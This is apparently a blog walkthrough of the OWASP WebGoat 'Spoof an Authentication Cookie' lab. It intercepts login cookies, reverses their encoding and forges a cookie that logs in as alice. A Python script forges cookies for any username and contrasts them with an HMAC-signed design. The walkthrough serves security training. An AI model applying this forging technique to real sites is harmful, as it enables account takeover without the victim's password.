SPOOFING AN AUTHENTICATION COOKIE
- Layout for this exercise:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyFia2APtyliAc5htBkpR_zVv-W_1wwCZDE_kTRcBbU5DWkLkWEdVJIYIiSRBSc3EB3luuwBsGceU92znlR-Uji3Ky95rOyizPrn0nl-MihHmxSYXFHOhPkP2ny2PGoS5OsROWym2fU9tE/s400/screenshot.2.jpg)
1 - Authentication cookies
- Authentication cookies are the most common method used by web servers to know whether the user is logged in or not, and which account they are logged in with.
https://en.wikipedia.org/wiki/HTTP_cookie
- Without such a mechanism, the site would not know whether to send a page containing sensitive information, or require the user to authenticate themselves by logging in.
- The security of an authentication cookie depends on the security of the issuing website and of the user's browser, and on whether the cookie value can be read or forged: a value that is merely encoded, rather than random or integrity-protected (for instance with a server-side signature), can be reconstructed by anyone who works out the encoding.
- Vulnerabilities may allow a cookie's data to be read by an attacker, used to gain access to user data, or used to gain access to the website with the privileges of the user the cookie belongs to.
- In this exercise the OWASP WebGoat v5.4 will be used for the purpose of exemplifying the spoofing of an authentication cookie:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9tSEx9y4NY_IwfRqLfhi5m7QZxoF-v6NwVwIPoMPJjEvYOOYetv_rpzH-hvK8wNUdYQXDM1MXBNsyexxnQ7wXIOENszlkIxbWnwHIw6r0kZChNPMMBitd9r_DUFUg9K1pV7lQIOOWyqNu/s1600/screenshot.1.jpg)
2 - Session Management Flaws
- Going to Session Management Flaws -> Spoof an Authentication Cookie:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiNv046KnZJ6OTc7ZfP2kEOJXfxH_aHfzzEGCjjH3ZANNTyLyXs7pD8NsDaDwWHfpZMdLP__Af0zevjD8Zzqd6tQyItwZ4ovyze2XwWT3TVGXvpIWeogN4rxyf2pzxhthYipP54bVa9Td7Z/s1600/screenshot.3.jpg)
- The scenario consists of a login form that works correctly for two known username/password pairs: signing in with webgoat/webgoat or aspect/aspect is accepted:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgwFQzaB8BNaNvC8yMmticv78VW-WfRqBxL2m15BrDT6z9Qt8kOmWTDwqgg_eyU-44EE6hl6_qqWmRvBZ1N49CUmLSw5r7DSFm5NYwvrQBFCQRw6fMTi3lG5arnoFUmZU5ZYx_ZjU5E-L7/s1600/screenshot.3.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic6tDqs47vgT1n7CHvgDTN8iHSfdeglJPq2ptfdB_38MhdbRiHAW2z_6j7-VHlXmV8f1B0Nem3oOlIG86Yx86YsiDWvGG4zECaYMFxl91oc2L2FavcpX_fQGU_uMzh-_TnhKgDJ8PZcNVJ/s400/screenshot.4.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjL1YpGiCodQtGc-GI_3ecu9ahtg_0UU7Lxym0T8WTAtCOUay2XULyIMz9rlmSygZfdjz1wVr6d2zS-q-EwcP7XQuNMGT26Pyj_3nxsSJ2us7zab7czb1BukMwIlM7SkpXsXJ5BcUb3di9c/s1600/screenshot.5.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8d0FW8JAbBlVgSmw_83VJjwqK_Dq_R0XcLvrRqAXmrGd8gn6HaYTAJIlvLoJbWkuc1vm7069Uxfvd3pAU4rQ_4Y1je7zCgoQs_IdnpElwgTLHWTVH5nIli_urN1IYfddQoV2goBnb2RJ-/s400/screenshot.6.jpg)
- The challenge, however, is to authenticate as the user alice, whose login is initially rejected because her password is unknown:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtVgoKHfKKQr8mWE4lNXdi7clQVw7h_R-TZBFE4FM9awwJRZzR8UvOzFOMjC5ogj_d2VKc74-EkBR3sJbVQf3kUXNV5Wyl6NBRmO1opHvkZuxpXCwFUz9vKdatRjavyWe9ydD0ryuA3vuc/s1600/screenshot.7.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGlrvP39wCaMKvvvXGuCECtwZ8zWebLuKVHI8HUXYwhXsI9rO5K4Nxpc43P6dmLLdK9vaPvxIdyz-RIOT906rKrMFPPtmkSCYEVQ3QVtg_JGAhAI2-Pw0MYMstr12zP9otPWyfPlqC1xrY/s400/screenshot.8.jpg)
3 - Tampering with the authentication process
- To capture the authentication cookies issued for webgoat/webgoat and aspect/aspect, let's use the Tamper Data add-on for Firefox, which intercepts requests and responses before the browser sends or processes them:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia0fmIwm2NHEZ49chHZx9JASscOfUZKJmqrULT9ZZ-MQp3YmJ6f4ZQoS852e8LcGRCn3vMmqC8odfRLa78tRmz0e9q-al3fUaMkuxaDmz6RoJwjWW2oYIe1YrZjSPtuuU_xyou6k6MFEjQ/s400/screenshot.9.jpg)
- Starting the tamper:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDxG9lMBnQHAvTWz1EaqD07fsYOY45NN4uKrkiBroCQy_VMLBL1NPNGL3MSsBPNB9_36xjPWKf1yGIipwAsA6K6q8Ap4-rR0CFS9CpRA1JzI0ZmuEjtga44HguAlD0WPwdjdAQdl6L36Zz/s400/screenshot.15.jpg)
- Now, let's sign in with webgoat/webgoat:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhaL1oApnvCrE4LhbFCc5rOFzHm7hChrQux71oi_JYvMJwjx4J6RVuJkc48eBCmqR9lMSwwmVabAWaDh2nKRHztN9Pu8sTA9gIqQKrulzUvflKh1qoR2mkUxY4_pWr_TcRWigU-kbgs7hhN/s1600/screenshot.11.jpg)
- Tampering:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEikL1ihCl4YGzM2arZRBPSJ0o4Tq4i0XkZQW4oNj1sCDDdQO0YpTyzZMIUo0g2XePO943doe79d0X3Bi3tdLva2zLG50299k67TUr_AXSzqmURWLn6q4bZVhIuVmLBbzdZJjeDcZYXQId-3/s1600/screenshot.50.jpg)
- Copying the cookie:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjaCUdpJoUbuxPhSdV1dzpjnR9DDrntvEkP4cbGwbWFR5FL-ECTtmDknm3NFX9Oe5xot7GwI66Cpgyiu0Gk_ogOlM1BQNzAxGeZ0HRkt7oz90fA_olg9Znc22qAapV4DqMWdOgMT2QC2VeK/s1600/screenshot.51.jpg)
- Storing the authentication cookie for further study:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIPQdOtcyrm1SBnlBCTuPrYawi3ogAN-aUjKf6JaFE4FdG7vqmFcrfeOteCnR7-HxJMySgirIPLkOH8FI0Bc9bQ0oOdL3EVWOSEmPzNC97orfg5ov0tJDqB6Eo5ZvD5Y3moYHGZBMqq29J/s1600/screenshot.52.jpg)
- Same thing for aspect/aspect:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiI_7jIHnfQ9wIOqmVPUmf5NewtxVUHttvYKUuvIk-AC8s2AxNC2aX-j_-Gla2AByx4TnPxn_gYaxvSqzaQsCwVJ3sat3S0eY2sXCm3KvBGv3ONKs1RGlf3YZ1UEisafu54CXzJnQbYGQSE/s400/screenshot.54.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhXF0dCYRROrwNCM96Ea8a_FhQMSwXeMiJeE-yGkVQWw7PH1ZdQNs4ylJxE1_q0TVtgmVdJTQn0Q1g_TXHlk5MDPcskxl9uaXyE_hBX4rdz34ByR1ud9LLnt8TSH-cZ-zK1FjirsVptWmFR/s1600/screenshot.53.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKLrPUb_BjqYIi5tQyfRhNqR8WzDdK3m6hrMBTMlo-HtBpF-WOwcLyOOw7sIuCC95XN1LRneMKGyxBrtNNgqVFI7mhWXgEjRqT7zyuaarRwZJ0gW3YC1hlcy6Ifeiws5wkWqEDPUxwQFYN/s1600/screenshot.56.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6o0Wg50-mcF-DAxYnb7CmIblj9i_ZuxFXboBXAvRHsoO4cYrvvt6_f9sdct8G9241WoViUsVDypI2V6fC-7UTdwC1d3VDKYvpKRrn00zyj-01w7RyfHhTmpFq8c7ozmvYDOdjx7FM3qPX/s1600/screenshot.57.jpg)
- As a result of the tampering, now we have two authentication cookies, one for webgoat/webgoat and the other one for aspect/aspect:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidXBBM1jrPjJ23nfqmIsRl4u1nbXeZsksbjkWuBkqlgKlIFBtlwN7XNapCSADaqtXNzOH9IHFQPXyec1kDGC87cNJPEipCXEnGqZBSOpQQbRqRBdqv0xXhAU5r_Z70nZ8pgm5wvCxR3q_b/s1600/screenshot.58.jpg)
- Comparing the two cookies it is clear that both start with 65432 and end with two different strings: ubphcfx and udfqtb. Note that the suffixes have exactly the length of the corresponding usernames (7 characters for webgoat, 6 for aspect), which suggests that the suffix is a per-character encoding of the username rather than a random session identifier.
4 - Decoding/encoding the cookies
- Going to yehg.net/encoding, an online encoding/decoding tool:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgM5PNLPI_1aXUX0PpfWGhIuorPOjHkYeaSKJMP1msNT8oXdt_l4iVc-MX6XFeLB7dedJMRd_0wc6pQVhT9aviEobtwBi6UIeNFZIFPi2zSDjOQsU9ByOXnEyAua1ORFSrlY5ZtB-8UXZqf/s320/screenshot.72.jpg)
- Entering the string ubphcfx and reversing:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1oBk6jkRvxInkoQHGD5hK7C4-IAXW0XsehOgePceRJGtig19YzdpobuufLs88C_e-7apEF-yHiSS1kQMlzxK7wpMl38JAQnDPl7B4UUEw506Ut9jIgaV63bHw-7kMYoclZ6gpdaaFoKuG/s1600/screenshot.4.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrzlbKAuio_146shxJru5hqz2ZkvCuhdxAQ-Ut7UOZZeWM1R7ertalZ0AQcriJNAU5I8ld21Xk8QHZfH-Wzz6v7wLq9Su4aaguNjLnQMOUSNrM_WSIbtI4MKT0qCZCBIRP-wjABxtnrp_-/s400/screenshot.74.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgYekMoSARXuIQKVaDOG0uQcEBHJFHnfie1us79x8SS-YTAMtNnnMrS4IcwYukkLyrB0sLt1NxTAguy9Cw101Itl3vhNYJrH-FZDzAhwo2KMEJWJWX8dfYax93iTaM_risbhvfn_gdFV1ee/s400/screenshot.75.jpg)
- Decoding with Char-- (shifting down one character):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTN068b37vW8PTQvnZzWrapmEn2WFA6qUJjRA5Rx-PG6DZnAhg7d8GVifyZFBnbX3DXb9Q-fSa-desIn3Z06uKmij3joIp78dwa1bkPbxWfRA8H2i4hkWuIjzbe6wrzyGiKVD4pAuLMKhP/s400/screenshot.76.jpg)
- The result is the expected webgoat:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNs7Qo77jgaENlLkSal0KOuwE9B4rQQ9Q-ZGvJcD1WeYy1JlJIoqwDHpaLv3gAHSCk39mZ6_P8oN4Dd-tUon-6N_t7rwKWDI4rVg85mkYUEOuLzi_Pl5s_Xp2ir14dUThgSq3EOT7iuisO/s1600/screenshot.77.jpg)
- The same process applied to the suffix udfqtb of the cookie obtained for aspect/aspect yields aspect:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3F5uO-1JVirToK6UZrWZCP92AYdlr3O7kDeY9xBiuM3lf-jJkwHTR0dnhq29t7baG7aJIioj7Z0uJ24jaapDuTQkUEmZHB1cn_2jbU90tniPnnbQDJ8KNsP8DCNTJ21v8cqki6JJxXA7T/s1600/screenshot.79.jpg)
- Knowing the decoding, we can run the steps in the opposite order on the username alice in order to produce the suffix for a cookie the server will accept:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh8xfi5joLehmLE6A2ARL6nP70E4PwiokwGBjKX4FsxDKB6TzCGC0lg5wiSPZPzom7WmtLui2-CH8_4A8UNpMI0ko60WagRn8SYberle23e7PhroTUoeOVII5PvjcV59U6LN50uJAiTQLhD/s400/screenshot.80.jpg)
- Reversing and encoding with Char++ (shifting up one character):
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMHlb7EUTOht8w-gWxy-_DkAE9ckJGiqarFDxRhy4gqudHyzvtGhhHWSDs6G0R8cH28URACP84r9hOHRQpj90pewB6v9cZGLUCFCzA33DWZsYVw86PC6yMFz4531_u40Niga3OnqWkMhPu/s400/screenshot.81.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgI8uaERo6I8pFXNHNQ69M-_WxFqm4NmKiEDfXZQOb_0cCsTcJXMmyjgeKzkZE0FFshXv90HeNXlSBFx0KnknGAe4VA2Xn4HFCDsMTxDNR9Oj3pJILh_g-Sv50U-Ip5-3ztJbWODnxyv-t_/s400/screenshot.33.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhp4LurbJ7HiwfEwLobbw7nnWcfnNpxGWmmMOGAIJ2zxBzPx-w_d8aciu4M9p6Df99o4QOJMAxBHKtRa4pGhsX2W50NHHAVOw1PlgoIjo6Jf9UCXxEHUL-7H_yI4Oc5iBvmkr3rFR4LqwXq/s1600/screenshot.34.jpg)
- The result is:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9XK6ZQqbub3xoRpwZIg7UQaash5-QPGME5wcvfj6zOh4MtatXWJpyJdkcl0gg1wmx-pOTrHl6IN75s8_chx2rctC1u8mrxhaMN0Yp18Z2CPnuOTjwRUZvwK_JxxcNNWye7siBKb_wJIiS/s400/screenshot.35.jpg)
- The encoding is therefore trivial: reverse the username, then shift every character up by one:
webgoat -> taogbew -> ubphcfx
aspect -> tcepsa -> udfqtb
alice -> ecila -> fdjmb
- To build alice's cookie the string fdjmb is appended to the constant prefix 65432, giving 65432fdjmb:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEOXbvvtLTQv3tTap58cxUHxm-HQxju0QxGdZSVDxz3wfxrqVTqyYG9z1LaGPJ255-AK0J_rSVkFRxGSonWf9RgGIO4LgqLCkSDAdJkzPw3NMhDP5RQxHTmQbVSR48sSudigBhSkln0gAo/s1600/screenshot.70.jpg)
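The whole encoding scheme recovered above, as an added example that is not part of the original post or of WebGoat's own code. It reproduces the two captured cookies to confirm the scheme before forging one for alice, and, for contrast, shows the kind of cookie a server should issue instead: a value bound to the username by an HMAC under a server-side secret (the key, the `|` separator and the `hmac_cookie`/`verify_hmac_cookie` names are assumptions for illustration, not WebGoat's design).

```python
#!/usr/bin/env python3
"""Forge the WebGoat 5.4 'Spoof an Authentication Cookie' value.

Recovered scheme: cookie = "65432" + shift_up_one(reverse(username)).
'Char++' / 'Char--' are plain +1 / -1 on the character code, as in the
yehg.net tool used on the page (no wrap-around at 'z').
"""
import hmac
import hashlib
import secrets

COOKIE_PREFIX = "65432"  # constant prefix observed on every captured cookie

# Cookies captured with Tamper Data on the page, used to validate the scheme.
CAPTURED = {"webgoat": "65432ubphcfx", "aspect": "65432udfqtb"}


def encode_username(username: str) -> str:
    """Reverse the username, then shift each character up by one (Char++)."""
    return "".join(chr(ord(c) + 1) for c in reversed(username))


def decode_suffix(suffix: str) -> str:
    """Inverse of encode_username: Char-- on each character, then reverse."""
    return "".join(chr(ord(c) - 1) for c in reversed(suffix))


def forge_cookie(username: str) -> str:
    """Build a cookie the vulnerable lesson accepts for any username."""
    return COOKIE_PREFIX + encode_username(username)


def username_from_cookie(cookie: str) -> str:
    """Recover the username carried by a cookie of the vulnerable scheme."""
    if not cookie.startswith(COOKIE_PREFIX):
        raise ValueError("cookie does not carry the expected 65432 prefix")
    return decode_suffix(cookie[len(COOKIE_PREFIX):])


def scheme_matches_captures(captured=CAPTURED) -> bool:
    """Round-trip every captured cookie; only forge for new users if this holds."""
    return all(forge_cookie(u) == c and username_from_cookie(c) == u
               for u, c in captured.items())


# --- What the server should have done instead (assumed design, not WebGoat's) ---
SERVER_KEY = secrets.token_bytes(32)  # kept server-side; never sent to the client


def hmac_cookie(username: str, key: bytes = SERVER_KEY) -> str:
    """username|HMAC-SHA256(key, username): reversible, but not forgeable."""
    tag = hmac.new(key, username.encode(), hashlib.sha256).hexdigest()
    return f"{username}|{tag}"


def verify_hmac_cookie(cookie: str, key: bytes = SERVER_KEY):
    """Return the username if the tag is valid, else None (constant-time compare)."""
    username, sep, tag = cookie.rpartition("|")
    if not sep:
        return None
    expected = hmac.new(key, username.encode(), hashlib.sha256).hexdigest()
    return username if hmac.compare_digest(expected, tag) else None


if __name__ == "__main__":
    assert scheme_matches_captures()
    print("forged cookie for alice:", forge_cookie("alice"))  # 65432fdjmb
    # Swapping the username in an HMAC cookie without the key fails verification.
    good = hmac_cookie("webgoat")
    tampered = "alice|" + good.split("|", 1)[1]
    print("hmac cookie verifies:", verify_hmac_cookie(good) == "webgoat")
    print("tampered hmac cookie rejected:", verify_hmac_cookie(tampered) is None)
```

The forged value is what gets pasted over the cookie in the next section. The contrast with the HMAC variant is the point of the lesson: a cookie whose value is derived from the username alone by a fixed transformation is a username, not a proof of authentication, whatever encoding is layered on top.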
5 - Launching the cookie spoofing attack
- Now, let's intercept the login request for webgoat/webgoat again with Tamper Data:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitY3EZ3Y_ozv7nWFuQ8otA7EjzoxVZ5kLXpByazTtxNfukPJHEfB9rzlkEVeUGE254k4p-DwsBLy-1yBujEQYqaa6hTjjpo0Bf4TYWA1cG__U3utwClDuMV7AmOA1eLLq1rpyYUGnXxNNY/s400/screenshot.62.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2eKPs-XISWkn41z4GWrNnz-yLHxiyM0kj6x865rAix-4P6G6WeUxPpLQfGlMn7whqoAkwss0fRmdqaAi1JhjC1mECQ2-jZyrzRKuGPDZ4RO561tKRAcdteO020OG3E59OF5vVfGq47jgb/s1600/screenshot.63.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_lt9Zdex1FZmp-c_LAx1Odn1tJ01IAkx9tt5cXCUd1B_OZS1mygPOeyARX76ZGDRNm92BwJ3gfof78aHtid1ZVvw-3o6h9fOzfQ4fYhBy9nwSluWgCg6MOIs5oEfnZke2ii-uXevYMZZr/s1600/screenshot.64.jpg)
- At this moment, let's copy alice's crafted cookie and paste it into the cookie field:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGjUrxg3lgX6xcPqgAg8I96JlRa0izaejRmg0yo86md3Xq90vAVnEwoYr-4-L-v5McaRO4nN68DoWMG_WLJaVP6fzFErnzyEou1CoEJThlDw26aoBpuGPBVFwqsaxfYmZqUT40z4E50PyJ/s1600/screenshot.60.jpg)
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgA3WqYbazHKicCmYEntOKEqkvD_yDPDEtuq7IFh2VYpLhUJYIESxA_ggfwBJliXmu0oz1bn5d91vBkzgRPXW1Pgg-Px5oC1-rIIhrXErSwgm05haIZYfcs1xd6ixoqbx0tNXFXRvrDRB6E/s1600/screenshot.67.jpg)
- Clicking OK:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixL42IXlIivxYTVgTLDqvmiYbFarmNRP03Crp7_KzLqqetXzdQNBUgIWjCd8wIxKIDXputHT3HQXCHx8hNPx_WiheSYwAvJYirJ-JQlEie2qce8nCv0wrNdDhlNRMB0NFTck3kaBoICzB1/s400/screenshot.68.jpg)
- The attack succeeds: the server accepts the forged cookie and treats the session as alice's, although alice's password was never entered:
![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjP9NOu8JvkQYevmI1JnqIon65Y0w-49R9hKw4w9Qjze5TZNcoGyGi1yz5O-LD50SYGWbtWQnpnwCPF6N800lwhO04MX8FrlxVkFDLNbEmZfbBGFeyYhC9Pz_f73qt48QY8R82koRnsqTYm/s1600/screenshot.71.jpg)